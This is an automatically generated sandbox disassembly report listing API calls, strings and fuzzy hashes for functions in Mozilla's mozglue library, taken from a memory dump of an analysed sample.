                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C5D3284,?,?,6C5F56F6), ref: 6C5D3492
                                                                                                                                                                                                                                                                                                                                  • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C5D3284,?,?,6C5F56F6), ref: 6C5D34A9
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C5D3284,?,?,6C5F56F6), ref: 6C5D34EF
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C5D350E
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C5D3522
                                                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 6C5D3552
                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C5D3284,?,?,6C5F56F6), ref: 6C5D357C
                                                                                                                                                                                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C5D3284,?,?,6C5F56F6), ref: 6C5D3592
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60AB89: EnterCriticalSection.KERNEL32(6C65E370,?,?,?,6C5D34DE,6C65F6CC,?,?,?,?,?,?,?,6C5D3284), ref: 6C60AB94
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60AB89: LeaveCriticalSection.KERNEL32(6C65E370,?,6C5D34DE,6C65F6CC,?,?,?,?,?,?,?,6C5D3284,?,?,6C5F56F6), ref: 6C60ABD1
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                                                                                                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3634367004-706389432
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ec014fe6a51b10e2f2ed784994da234df64d401dc57e17eb5ac092d4f2f37f9d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ff6c90751ecf899f450b2ba8a89e7fe0e4718e82eb8efba589af9a66fba505de
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec014fe6a51b10e2f2ed784994da234df64d401dc57e17eb5ac092d4f2f37f9d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E31C471B012059BDF04DFBACD98AAE77B5FB86304F650419E501E3690EB70A905CF69
                                                                                                                                                                                                                                                                                                                                  Function 6C5D4480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: free$moz_xmalloc
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3009372454-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 04a0f89a75f7084f9cb8e751e35cbe04ed369c8ddec99c522680bfbed1277674
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6b4d7400da3f025c1cc641b2b122a39e568db534936918d755deeba5f8b02fb1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04a0f89a75f7084f9cb8e751e35cbe04ed369c8ddec99c522680bfbed1277674
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94B1E571A002508FDB18CF3CDC9076D77A2AF81328F1A4669E416DBB96E731EC80CB85
                                                                                                                                                                                                                                                                                                                                  Function 6C63AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1192971331-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6b6aafb14f3f12747100b532e4d15c2d391ebb5557f61946f06a7e3f2e8b80c7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ddc07e36fd5e50f32547a8b0577775114b9e7bcfdb4c27cac3422107b737a387
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b6aafb14f3f12747100b532e4d15c2d391ebb5557f61946f06a7e3f2e8b80c7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C03172B1A047048FDB00EFBDD68826EBBF0FF85305F55992DE98997211EB709449CB86
                                                                                                                                                                                                                                                                                                                                  Function 6C5E9620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C5E9675
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C5E9697
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C5E96E8
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C5E9707
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C5E971F
                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C5E9773
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60AB89: EnterCriticalSection.KERNEL32(6C65E370,?,?,?,6C5D34DE,6C65F6CC,?,?,?,?,?,?,?,6C5D3284), ref: 6C60AB94
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60AB89: LeaveCriticalSection.KERNEL32(6C65E370,?,6C5D34DE,6C65F6CC,?,?,?,?,?,?,?,6C5D3284,?,?,6C5F56F6), ref: 6C60ABD1
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C5E97B7
                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 6C5E97D0
                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 6C5E97EB
                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C5E9824
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                                                                                                                                                                                                                                                                  • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 409848716-3880535382
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7af31bd9d1caf05ab38784b412d37af4710e2c9cb3fca5ffac36798e92e72cfb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 152b3323a961b0a00fb16486163bcb58ca1ba9b152b148bacdbeedcefa109258
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7af31bd9d1caf05ab38784b412d37af4710e2c9cb3fca5ffac36798e92e72cfb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F541ADB17002069FDF00DFA6ECD4E967BB4EB4A364FA04128ED0597740D730A818CFAA
                                                                                                                                                                                                                                                                                                                                  Function 6C629D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C628273), ref: 6C629D65
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(6C628273,?), ref: 6C629D7C
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?), ref: 6C629D92
                                                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C629E0F
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(6C62946B,?,?), ref: 6C629E24
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?), ref: 6C629E3A
                                                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C629EC8
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(6C62946B,?,?,?), ref: 6C629EDF
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?), ref: 6C629EF5
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 956590011-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5d141aee42f8c1154796d9e2e23562edd1078d788eb338edd3e5fabbb475a7e0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e92143d601f4e33e888a683d0d706c4ab2d534824c9a275faa4438dbfc869fb7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d141aee42f8c1154796d9e2e23562edd1078d788eb338edd3e5fabbb475a7e0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C771BE70909B41CBC716CF18C88055AF7F5FFD9318B809A59E99A5BB01EB30E886CF81
                                                                                                                                                                                                                                                                                                                                  Function 6C62DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C62DDCF
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C60FA4B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C6290E0: free.MOZGLUE(?,00000000,?,?,6C62DEDB), ref: 6C6290FF
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C6290E0: free.MOZGLUE(?,00000000,?,?,6C62DEDB), ref: 6C629108
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C62DE0D
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C62DE41
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C62DE5F
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C62DEA3
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C62DEE9
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C61DEFD,?,6C5E4A68), ref: 6C62DF32
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C62DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C62DB86
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C62DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C62DC0E
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C61DEFD,?,6C5E4A68), ref: 6C62DF65
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C62DF80
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C5F5EDB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5E90: memset.VCRUNTIME140(ewcl,000000E5,?), ref: 6C5F5F27
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C5F5FB2
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 112305417-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 22314e3db5143f6fa7167c526437430d82270389a31a800d9f90b5e8a20b0319
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 84673341253f0ce5c9103d1259b7aa0491cdf0cea04f70ca848b03d34337e562
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22314e3db5143f6fa7167c526437430d82270389a31a800d9f90b5e8a20b0319
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1251C5726016019BD720DB28C8806EEB3B2BFD6308F95451CD99A53B00D739F91ACF8E
                                                                                                                                                                                                                                                                                                                                  Function 6C635D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C635C8C,?,6C60E829), ref: 6C635D32
                                                                                                                                                                                                                                                                                                                                  • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C635C8C,?,6C60E829), ref: 6C635D62
                                                                                                                                                                                                                                                                                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C635C8C,?,6C60E829), ref: 6C635D6D
                                                                                                                                                                                                                                                                                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C635C8C,?,6C60E829), ref: 6C635D84
                                                                                                                                                                                                                                                                                                                                  • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C635C8C,?,6C60E829), ref: 6C635DA4
                                                                                                                                                                                                                                                                                                                                  • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C635C8C,?,6C60E829), ref: 6C635DC9
                                                                                                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6C635DDB
                                                                                                                                                                                                                                                                                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C635C8C,?,6C60E829), ref: 6C635E00
                                                                                                                                                                                                                                                                                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C635C8C,?,6C60E829), ref: 6C635E45
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2325513730-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9e98bfeade210b84deb3c76ef6abedc088370e1b1dd642fab251f4f73ab9cdee
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0f614f6ce7983ee76c808223fd4fe8afe700b2de1f336471ab415d64ed617857
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e98bfeade210b84deb3c76ef6abedc088370e1b1dd642fab251f4f73ab9cdee
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5416C307002159FCB04DF66C8D8AAE77F5EF89318F545168E50A9B791EB34E805CBAD
                                                                                                                                                                                                                                                                                                                                  Function 6C60CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C5D31A7), ref: 6C60CDDD
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-2186867486
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1eb2a61420fc0e89842d5f827330b60f09bdaa22fa024cf4a8ea58d845c73b3b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 973a96298734e7b0bef77ef334e780561bb1ca0ae2168f629a6c4a96bf8108ee
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1eb2a61420fc0e89842d5f827330b60f09bdaa22fa024cf4a8ea58d845c73b3b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F31A4307402056BEF18AFA98D85BAE7B75AF81758F704014F612BBA80DB70D501CBBE
                                                                                                                                                                                                                                                                                                                                  Function 6C5DECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5DF100: LoadLibraryW.KERNEL32(shell32,?,6C64D020), ref: 6C5DF122
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5DF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C5DF132
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000012), ref: 6C5DED50
                                                                                                                                                                                                                                                                                                                                  • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5DEDAC
                                                                                                                                                                                                                                                                                                                                  • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C5DEDCC
                                                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32 ref: 6C5DEE08
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C5DEE27
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C5DEE32
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5DEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C5DEBB5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5DEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C60D7F3), ref: 6C5DEBC3
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5DEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C60D7F3), ref: 6C5DEBD6
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C5DEDC1
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                                                                                                                                                                                  • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1980384892-344433685
